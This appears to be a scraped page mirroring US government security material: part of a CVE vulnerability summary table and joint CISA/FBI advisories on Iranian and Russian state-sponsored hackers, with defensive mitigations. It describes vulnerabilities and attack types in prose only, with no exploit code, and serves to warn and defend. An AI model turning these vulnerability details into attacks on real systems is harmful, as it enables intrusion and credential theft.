ubuntu — ubuntu	In containerd (an industry-standard container runtime) before version 1.2.14 there is a credential leaking vulnerability. If a container image manifest in the OCI Image format or Docker Image V2 Schema 2 format includes a URL for the location of a specific image layer (otherwise known as a “foreign layer”), the default containerd resolver will follow that URL to attempt to download it. In v1.2.x but not 1.3.0 or later, the default containerd resolver will provide its authentication credentials if the server where the URL is located presents an HTTP 401 status code along with registry-specific HTTP headers. If an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account. The default containerd resolver is used by the cri-containerd plugin (which can be used by Kubernetes), the ctr development tool, and other client programs that have explicitly linked against it. This vulnerability has been fixed in containerd 1.2.14. containerd 1.3 and later are not affected. If you are using containerd 1.3 or later, you are not affected. If you are using cri-containerd in the 1.2 series or prior, you should ensure you only pull images from trusted sources. Other container runtimes built on top of containerd but not using the default resolver (such as Docker) are not affected.	2020-10-16	not yet calculated	CVE-2020-15157 MISC CONFIRM UBUNTU UBUNTU
ucms — ucms	An arbitrary command execution vulnerability exists in the fopen() function of file writes of UCMS v1.4.8, where an attacker can gain access to the server.	2020-10-23	not yet calculated	CVE-2020-25483 MISC
ucweb — uc_browser	User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of UCWeb’s UC Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects UCWeb’s UC Browser version 13.0.8 and prior versions.	2020-10-20	not yet calculated	CVE-2020-7364 MISC MISC
ucweb — uc_browser	User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of UCWeb’s UC Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects UCWeb’s UC Browser version 13.0.8 and prior versions.	2020-10-20	not yet calculated	CVE-2020-7363 MISC MISC
ucweb — uc_browser	User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of the Yandex Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the RITS Browser version 3.3.9 and prior versions.	2020-10-20	not yet calculated	CVE-2020-7371 MISC MISC
velero — velero	Velero (prior to 1.4.3 and 1.5.2) in some instances doesn’t properly manage volume identifiers which may result in information leakage to unauthorized users.	2020-10-22	not yet calculated	CVE-2020-3996 MISC
verifone — mx900_series_pinpad_payment_terminals	Verifone MX900 series Pinpad Payment Terminals with OS 30251000 have a race condition for RBAC bypass.	2020-10-23	not yet calculated	CVE-2019-14711 MISC
verifone — mx900_series_pinpad_payment_terminals	Verifone MX900 series Pinpad Payment Terminals with OS 30251000 allow installation of unsigned packages.	2020-10-23	not yet calculated	CVE-2019-14713 MISC
verifone — mx900_series_pinpad_terminals	Verifone MX900 series Pinpad Payment Terminals with OS 30251000 allow multiple arbitrary command injections, as demonstrated by the file manager.	2020-10-23	not yet calculated	CVE-2019-14719 MISC
verifone — mx900_series_pinpad_terminals	Verifone MX900 series Pinpad Payment Terminals with OS 30251000 have Insecure Permissions, with resultant svc_netcontrol arbitrary command injection and privilege escalation.	2020-10-23	not yet calculated	CVE-2019-14718 MISC
verifone — pinpad_payment_terminals	Verifone Pinpad Payment Terminals allow undocumented physical access to the system via an SBI bootloader memory write operation.	2020-10-23	not yet calculated	CVE-2019-14715 MISC
verifone — verixv_pinpad_payment_terminals	Verifone VerixV Pinpad Payment Terminals with QT000530 allow bypass of integrity and origin control for S1G file generation.	2020-10-23	not yet calculated	CVE-2019-14712 MISC
verifone — verixv_pinpad_payment_terminals	Verifone VerixV Pinpad Payment Terminals with QT000530 have an undocumented physical access mode (aka VerixV shell.out).	2020-10-23	not yet calculated	CVE-2019-14716 MISC
verifone — verixv_pinpad_payment_terminals	Verifone Verix OS on VerixV Pinpad Payment Terminals with QT000530 have a Buffer Overflow via the Run system call.	2020-10-23	not yet calculated	CVE-2019-14717 MISC
vm-superio — vm-superio	In vm-superio before 0.1.1, the serial console FIFO can grow to unlimited memory usage when data is sent to the input source (i.e., standard input). This behavior cannot be reproduced from the guest side. When no rate limiting is in place, the host can be subject to memory pressure, impacting all other VMs running on the same host.	2020-10-16	not yet calculated	CVE-2020-27173 MISC MISC
vmware — horizon_client	VMware Horizon Client for Windows (5.x prior to 5.5.0) contains an information disclosure vulnerability. A malicious attacker with local privileges on the machine where Horizon Client for Windows is installed may be able to retrieve hashed credentials if the client crashes.	2020-10-23	not yet calculated	CVE-2020-3998 MISC
vmware — horizon_server	VMware Horizon Server (7.x prior to 7.10.3 or 7.13.0) contains a Cross Site Scripting (XSS) vulnerability. Successful exploitation of this issue may allow an attacker to inject malicious script which will be executed.	2020-10-23	not yet calculated	CVE-2020-3997 MISC
vmware — multiple_products	In VMware ESXi (6.7 before ESXi670-201908101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x before 15.1.0), Fusion (11.x before 11.1.0), the VMCI host drivers used by VMware hypervisors contain a memory leak vulnerability. A malicious actor with access to a virtual machine may be able to trigger a memory leak issue resulting in memory resource exhaustion on the hypervisor if the attack is sustained for extended periods of time.	2020-10-20	not yet calculated	CVE-2020-3995 MISC
vmware — multiple_products	OpenSLP as used in VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202010401-SG, 6.5 before ESXi650-202010401-SG) has a use-after-free issue. A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution.	2020-10-20	not yet calculated	CVE-2020-3992 MISC
vmware — multiple_products	VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202008101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x), Fusion (11.x before 11.5.6) contain an out-of-bounds write vulnerability due to a time-of-check time-of-use issue in ACPI device. A malicious actor with administrative access to a virtual machine may be able to exploit this vulnerability to crash the virtual machine’s vmx process or corrupt hypervisor’s memory heap.	2020-10-20	not yet calculated	CVE-2020-3982 MISC
vmware — multiple_products	VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202008101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x), Fusion (11.x before 11.5.6) contain an out-of-bounds read vulnerability due to a time-of-check time-of-use issue in ACPI device. A malicious actor with administrative access to a virtual machine may be able to exploit this issue to leak memory from the vmx process.	2020-10-20	not yet calculated	CVE-2020-3981 MISC
vmware — nsx-t	VMware NSX-T (3.x before 3.0.2, 2.5.x before 2.5.2.2.0) contains a security vulnerability that exists in the way it allows a KVM host to download and install packages from NSX manager. A malicious actor with MITM positioning may be able to exploit this issue to compromise the transport node.	2020-10-20	not yet calculated	CVE-2020-3993 MISC
vmware — vcenter_server	VMware vCenter Server (6.7 before 6.7u3, 6.6 before 6.5u3k) contains a session hijack vulnerability in the vCenter Server Appliance Management Interface update function due to a lack of certificate validation. A malicious actor with network positioning between vCenter Server and an update repository may be able to perform a session hijack when the vCenter Server Appliance Management Interface is used to download vCenter updates.	2020-10-20	not yet calculated	CVE-2020-3994 MISC
webpack-subsource-integrity — webpack-subsource-integrity	In webpack-subresource-integrity before version 1.5.1, all dynamically loaded chunks receive an invalid integrity hash that is ignored by the browser, and therefore the browser cannot validate their integrity. This removes the additional level of protection offered by SRI for such chunks. Top-level chunks are unaffected. This issue is patched in version 1.5.1.	2020-10-19	not yet calculated	CVE-2020-15262 MISC MISC CONFIRM
wire — wire	In Wire before 3.20.x, `shell.openExternal` was used without checking the URL. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened. The issue was patched by implementing a helper function which checks if the URL’s protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed. The issue is patched in Wire 3.20.x. More technical details about exploitation are available in the linked advisory.	2020-10-16	not yet calculated	CVE-2020-15258 MISC MISC CONFIRM
wso2 — api_manager	WSO2 API Manager 3.1.0 and earlier has reflected XSS on the “publisher” component’s admin interface. More precisely, it is possible to inject an XSS payload into the owner POST parameter, which does not filter user inputs. By putting an XSS payload in place of a valid Owner Name, a modal box appears that writes an error message concatenated to the injected payload (without any form of data encoding). This can also be exploited via CSRF.	2020-10-21	not yet calculated	CVE-2020-17454 CONFIRM
xen — xen	An issue was discovered in Xen through 4.14.x allowing x86 guest OS users to cause a host OS denial of service, achieve data corruption, or possibly gain privileges by exploiting a race condition that leads to a use-after-free involving 2MiB and 1GiB superpages.	2020-10-22	not yet calculated	CVE-2020-27672 MISC
xen — xen	An issue was discovered in Xen through 4.14.x allowing x86 HVM and PVH guest OS users to cause a denial of service (data corruption), cause a data leak, or possibly gain privileges because coalescing of per-page IOMMU TLB flushes is mishandled.	2020-10-22	not yet calculated	CVE-2020-27671 MISC
xen — xen	An issue was discovered in Xen through 4.14.x allowing x86 guest OS users to cause a denial of service (data corruption), cause a data leak, or possibly gain privileges because an AMD IOMMU page-table entry can be half-updated.	2020-10-22	not yet calculated	CVE-2020-27670 MISC
xen — xen	An issue was discovered in Xen through 4.14.x allowing x86 PV guest OS users to gain guest OS privileges by modifying kernel memory contents, because invalidation of TLB entries is mishandled during use of an INVLPG-like attack technique.	2020-10-22	not yet calculated	CVE-2020-27674 MISC
xwiki — xwiki	In XWiki before version 12.5 and 11.10.6, any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution. This is patched in XWiki 12.5 and XWiki 11.10.6.	2020-10-16	not yet calculated	CVE-2020-15252 CONFIRM MISC MISC
yubico — yubihsm-shell	An issue was discovered in the _send_secure_msg() function of yubihsm-shell through 2.0.2. The function does not validate the embedded length field of a message received from the device. This could lead to an oversized memcpy() call that will crash the running process. This could be used by an attacker to cause a denial of service.	2020-10-19	not yet calculated	CVE-2020-24388 MISC MISC MISC MISC
yubico — yubihsm-shell	An issue was discovered in the yh_create_session() function of yubihsm-shell through 2.0.2. The function does not explicitly check the returned session id from the device. An invalid session id would lead to out-of-bounds read and write operations in the session array. This could be used by an attacker to cause a denial of service attack.	2020-10-19	not yet calculated	CVE-2020-24387 MISC MISC MISC MISC

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems

Post author By admin
Post date October 22, 2020

Original release date: October 22, 2020<br/><h3>Summary</h3><p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.</p>

<p>The APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.</p>

<p>The APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. </p>

<p>Click here for a <a href=”https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296B_Iranian_APT_Actors_Threaten_Election-Related_Systems.pdf”>PDF</a> version of this report.</p>
<h3>Technical Details</h3><p class=”MsoNormal”>These actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs)—notably <a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-5902″>CVE-2020-5902</a> and <a href=”https://nvd.nist.gov/vuln/detail/CVE-2017-9248″>CVE-2017-9248</a>—pertaining to virtual private networks (VPNs) and content management systems (CMSs).  <o:p></o:p></p>

<ul>
<li><a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-5902″>CVE-2020-5902</a> affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code. [<a href=”https://support.f5.com/csp/article/K52145254″>1</a>].</li>
<li><a href=”https://nvd.nist.gov/vuln/detail/CVE-2017-9248″>CVE-2017-9248</a> affects Telerik UI. Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks.[<a href=”https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness”>2</a>]</li>
</ul>

<p>Historically, these actors have conducted DDoS attacks, SQL injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render these systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.</p>

<ul>
<li><strong>A DDoS attack </strong>could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.</li>
<li><strong>A SQL injection</strong> involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company’s CMS could enable a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.</li>
<li><strong>Spear-phishing messages</strong> may not be easily detectible. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information—often credentials, such as passwords—and to identify follow-on victims. A malicious cyber actor could use compromised email access to spread disinformation to the victims’ contacts or collect information sent to or from the compromised account.</li>
<li><strong>Public-facing website defacements</strong> typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site’s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites’ information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised..</li>
<li><strong>Disinformation campaigns </strong>involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors’ use of their platforms to promote fictitious news stories by removing the news stories, and in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.</li>
</ul>
<h3>Mitigations</h3><p>The following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:</p>

<ul>
<li>Validate input—input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws of web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly prevented include SQL injection, XSS, and command injection.</li>
<li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li>
<li>Verify all cloud-based virtual machine instances with a public IP; do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.</li>
<li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li>
<li>Apply multi-factor authentication, when possible.</li>
<li>Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248.
<ul>
<li>For patch information on CVE-2020-5902, refer to F5 Security Advisory <a href=”https://support.f5.com/csp/article/K52145254″>K52145254</a>.</li>
<li>For patch information on CVE-2017-9248, refer to <a href=”https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness”>Progress Telerik details for CVE-2017-9248</a>.</li>
</ul>
</li>
<li>Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.</li>
<li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.</li>
<li>When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.</li>
<li>Ensure third parties that require RDP access are required to follow internal policies on remote access.</li>
<li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li>
<li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.</li>
<li>Be aware of unsolicited contact on social media from any individual you do not know.</li>
<li>Be aware of attempts to pass links or files via social media from anyone you do not know.</li>
<li>Be aware of unsolicited requests to share a file via online services.</li>
<li>Be aware of email messages conveying suspicious alerts or other online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.</li>
<li>Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).</li>
<li>Be suspicious of unsolicited email messages that contain shortened links (e.g., via <code>tinyurl</code>, <code>bit.ly</code>).</li>
<li>Use security features provided by social media platforms, use <a href=”https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords”>strong passwords</a>, change passwords frequently, and use a different password for each social media account.</li>
<li>See CISA’s <a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>Tip on Best Practices for Securing Election Systems</a> for more information.</li>
</ul>

<h4>General Mitigations</h4>

<h5>Keep applications and systems updated and patched</h5>

<p>Apply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These “N-day” exploits can be as damaging as a zero-day exploits. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle.[<a href=”https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1″>3</a>] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool[<a href=”https://owasp.org/www-project-dependency-check/”>4</a>]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.</p>

<h5>Scan web applications for SQL injection and other common web vulnerabilities</h5>

<p>Implement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner.[<a href=”https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm”>5</a>] As vulnerabilities are found, they should be fixed or patched. This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.</p>

<h5>Deploy a web application firewall </h5>

<p>Deploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.</p>

<h5>Deploy techniques to protect against web shells</h5>

<p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware.[<a href=”https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF”>6</a>] Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.</p>

<h5>Use multi-factor authentication for administrator accounts</h5>

<p>Prioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets.[<a href=”https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs”>7</a>] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs).[<a href=”https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf”>8</a>] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p>

<h5>Remediate critical web application security risks</h5>

<p>First, identify and remedite critical web application security risks first; then, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.[<a href=”https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm”>9</a>],[<a href=”https://owasp.org/www-project-top-ten/”>10</a>],[<a href=”https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html”>11</a>]</p>

<h5>How do I respond to unauthorized access to election-related systems?</h5>

<h6>Implement your security incident response and business continuity plan</h6>

<h6>Contact CISA or law enforcement immediately</h6>

<p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href=”https://us-cert.cisa.govmailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a> or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI’s Cyber Division (<a href=”https://us-cert.cisa.govmailto:CyWatch@ic.fbi.gov”>CyWatch@ic.fbi.gov</a> or 855-292-3937).</p>

<h3>Resources</h3>

<ul>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>CISA Tip: Best Practices for Securing Election Systems</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST16-001″>CISA Tip: Securing Voter Registration Data</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST18-006″>CISA Tip: Website Security</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST04-014″>CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST18-001″>CISA Tip: Securing Network Infrastructure Devices</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>CISA Activity Alert: Technical Approaches to Uncovering and Remediating Malicious Activity</a></li>
<li><a href=”https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf “>CISA Insights: Actions to Counter Email-Based Attacks On Election-related Entities</a></li>
<li>FBI and CISA Public Service Announcement (PSA): <a href=”https://ic3.gov/Media/Y2020/PSA201002″>Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li>
<li>FBI and CISA PSA: <a href=”https://www.ic3.gov/Media/Y2020/PSA201001″>Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a></li>
<li>FBI and CISA PSA: <a href=”https://www.ic3.gov/Media/Y2020/PSA200930″>Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a></li>
<li>FBI and CISA PSA: <a href=”https://www.ic3.gov/Media/Y2020/PSA200928″>False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200924″>Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200922″>Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Results</a><br />
 </li>
</ul>
<h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”http://www.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href=”https://us-cert.cisa.govmailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govmailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a>.</p>

<p><o:p></o:p></p>
<h3>References</h3>
<ul> <li><a href=”https://support.f5.com/csp/article/K52145254″>[1] F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li> <li><a href=”https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness”>[2] Progress Telerik details for CVE-2017-9248</a></li> <li><a href=”https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf”>[3] NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies</a></li> <li><a href=”https://owasp.org/www-project-dependency-check/”>[4] OWASP Dependency-Check</a></li> <li><a href=”https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm”>[5] NSA “Defending Against the Exploitation of SQL Vulnerabilities to Compromise a Network” </a></li> <li><a href=”https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF”>[6] NSA & ASD “CyberSecurity Information: Detect and Prevent Web Shell Malware” </a></li> <li><a href=”https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs”>[7] CISA: Identifying and Protecting High Value Assets: A Closer Look at Governance Needs for HVAs: </a></li> <li><a href=”https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf”>[8] NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies” </a></li> <li><a href=”https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm”>[9] NSA “Building Web Applications – Security for Developers”: </a></li> <li><a href=”https://owasp.org/www-project-top-ten/”>[10] OWASP Top Ten</a></li> <li><a href=”https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html”>[11] 2020 CWE Top 25 Most Dangerous Software Weaknesses</a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 22, 2020: Initial Version</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy & Use</a> policy.</p>

</div>

alerts

AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets

Post author By admin
Post date October 22, 2020

Original release date: October 22, 2020 | Last revised: November 17, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the <a href=”https://attack.mitre.org/versions/v7/”>ATT&CK for Enterprise</a> framework for all referenced threat actor tactics and techniques </em></p>

<p>This joint cybersecurity advisory—written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)—provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-283a”>AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations</a>.</p>

<p>Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.</p>

<p>The Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:</p>

<ul>
<li>Sensitive network configurations and passwords.</li>
<li>Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).</li>
<li>IT instructions, such as requesting password resets.</li>
<li>Vendors and purchasing information.</li>
<li>Printing access badges.</li>
</ul>

<p>To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.</p>

<p>As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.</p>

<ul>
<li>Click here for a <a href=”https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296A__Russian_State_Sponsored_APT_Actor_Compromise_US_Government_Targets.pdf”>PDF</a> version of this report.</li>
<li>Click here for a <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-296A.stix.xml”>STIX</a> package of IOCs.</li>
</ul>

<h4>U.S. Heat Map of Activity</h4>

<p><a href=”https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769″>Click here</a> for an interactive heat map of this activity. Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.</p>

<p><strong>Note</strong>: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email <a href=”https://us-cert.cisa.govmailto: info@us-cert.gov”>info@us-cert.gov</a>. To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.</p>

<p><strong>Note</strong>: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.</p>
